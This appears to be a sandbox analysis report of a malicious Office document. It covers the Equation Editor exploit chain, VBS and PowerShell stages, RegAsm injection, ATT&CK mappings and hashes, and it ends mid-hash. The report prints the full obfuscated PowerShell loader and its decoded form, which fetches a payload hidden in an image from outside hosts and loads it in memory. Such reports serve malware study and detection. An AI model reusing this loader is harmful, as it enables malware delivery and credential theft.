Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	1272	RegAsm.exe
Token: SeShutdownPrivilege	2484	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

2088 EXCEL.EXE
2088 EXCEL.EXE
2088 EXCEL.EXE
2484 WINWORD.EXE
2484 WINWORD.EXE

pid	process
2088	EXCEL.EXE
2088	EXCEL.EXE
2088	EXCEL.EXE
2484	WINWORD.EXE
2484	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEEQNEDT32.EXEWScript.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 2484 wrote to memory of 2284	2484	WINWORD.EXE	splwow64.exe
PID 2484 wrote to memory of 2284	2484	WINWORD.EXE	splwow64.exe
PID 2484 wrote to memory of 2284	2484	WINWORD.EXE	splwow64.exe
PID 2484 wrote to memory of 2284	2484	WINWORD.EXE	splwow64.exe
PID 1692 wrote to memory of 2216	1692	EQNEDT32.EXE	WScript.exe
PID 1692 wrote to memory of 2216	1692	EQNEDT32.EXE	WScript.exe
PID 1692 wrote to memory of 2216	1692	EQNEDT32.EXE	WScript.exe
PID 1692 wrote to memory of 2216	1692	EQNEDT32.EXE	WScript.exe
PID 2216 wrote to memory of 2460	2216	WScript.exe	powershell.exe
PID 2216 wrote to memory of 2460	2216	WScript.exe	powershell.exe
PID 2216 wrote to memory of 2460	2216	WScript.exe	powershell.exe
PID 2216 wrote to memory of 2460	2216	WScript.exe	powershell.exe
PID 2460 wrote to memory of 2700	2460	powershell.exe	powershell.exe
PID 2460 wrote to memory of 2700	2460	powershell.exe	powershell.exe
PID 2460 wrote to memory of 2700	2460	powershell.exe	powershell.exe
PID 2460 wrote to memory of 2700	2460	powershell.exe	powershell.exe
PID 2700 wrote to memory of 1708	2700	powershell.exe	powershell.exe
PID 2700 wrote to memory of 1708	2700	powershell.exe	powershell.exe
PID 2700 wrote to memory of 1708	2700	powershell.exe	powershell.exe
PID 2700 wrote to memory of 1708	2700	powershell.exe	powershell.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 2700 wrote to memory of 1188	2700	powershell.exe	RegAsm.exe
PID 1188 wrote to memory of 1824	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1824	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1824	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1824	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1824	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1824	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1824	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1824	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 2112	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 2112	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 2112	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 2112	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 2112	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 2112	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 2112	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1448	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1448	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1448	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1448	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1448	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1448	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1448	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1448	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1272	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1272	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1272	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1272	1188	RegAsm.exe	RegAsm.exe
PID 1188 wrote to memory of 1272	1188	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\scanned Draft Copy.xla.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2088

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2484

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2284

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1692

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\megapixelpiclove.vbs"
2⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDUDgTreNQDgTrevDgTreDkDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwByDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrewDgTreDQDgTreMQDgTrezDgTreDkDgTreOQDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre1DgTreDUDgTreLwDgTre5DgTreDkDgTreNwDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTrecgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMDgTreDgTre0DgTreDEDgTreMwDgTre5DgTreDkDgTreMwDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBIDgTreEMDgTreQQBNDgTreC8DgTreMQDgTre0DgTreDEDgTreNDgTreDgTrevDgTreDIDgTreODgTreDgTreuDgTreDkDgTreMQDgTreyDgTreC4DgTreMgDgTrezDgTreC4DgTreNwDgTrewDgTreDIDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE0DgTreQQBDDgTreEgDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993', 'https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HCAM/1414/28.912.23.702//:ptth' , '1' , 'C:\ProgramData\' , 'MACH','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\MACH.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1188

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ykwudghzmytsijxxy"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1824

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\imbfezsbaglxsxlbplnog"
6⤵
PID:2112

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\imbfezsbaglxsxlbplnog"
6⤵
- Accesses Microsoft Outlook accounts
PID:1448

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\kghyerdvwodkuehfywzqrsex"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61

Filesize
299B

MD5
5ae8478af8dd6eec7ad4edf162dd3df1

SHA1
55670b9fd39da59a9d7d0bb0aecb52324cbacc5a

SHA256
fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca

SHA512
a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
ecbbd8ab2ecd674ed7e6c616781bfd5f

SHA1
a056e04bb0337a185cf582e43a39d3965236d402

SHA256
a9499c0608fc043387b0c7b688b87762710ac907257527c82accfa6052c5062b

SHA512
7b86818ce7c7f27b6ecc15040ff1fa8a258e09f5a8e375e7eb61d27b2bf3fba3fc6b36ea6d342542836dbde88ef87ee5af7227615b3465345ed4adf83a1a26df

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61

Filesize
192B

MD5
5804d07a0610ba7492b73c6dc2c7002b

SHA1
6d04f88c99f3003773c636fc68926006fef172ad

SHA256
8bc66e06c4441e65efd99f2c9ea0782cc714ff3a16250c9d1d71a9d4051e356f

SHA512
6ded63bd4d7744a592110d2a531126c7e93b3d6fa0aaf0587b78e781bbfdd7f5facb27f8adec4996e4ebf653d2bfc3d4c9a7066ffde8c978132616f511d36ec7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5812d4f5cea00227218c4380f17d76be

SHA1
8b2d9109ddb8ad319ed71df11fb3a6f1355f361c

SHA256
61aed6d9e8b527c2268d643f5db5631beeaea68484b63a21d2543b5bb5b663a7

SHA512
fb330da949941d1c0355ef288211389cc84f96bf3b412dd1f1cbdc92fcd45801558fa0c7d3ce3a83caf6eba732ab3986f334972c1ac28ad82a830646c71c93dd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f7241007cd5ba954b102ae305322202e

SHA1
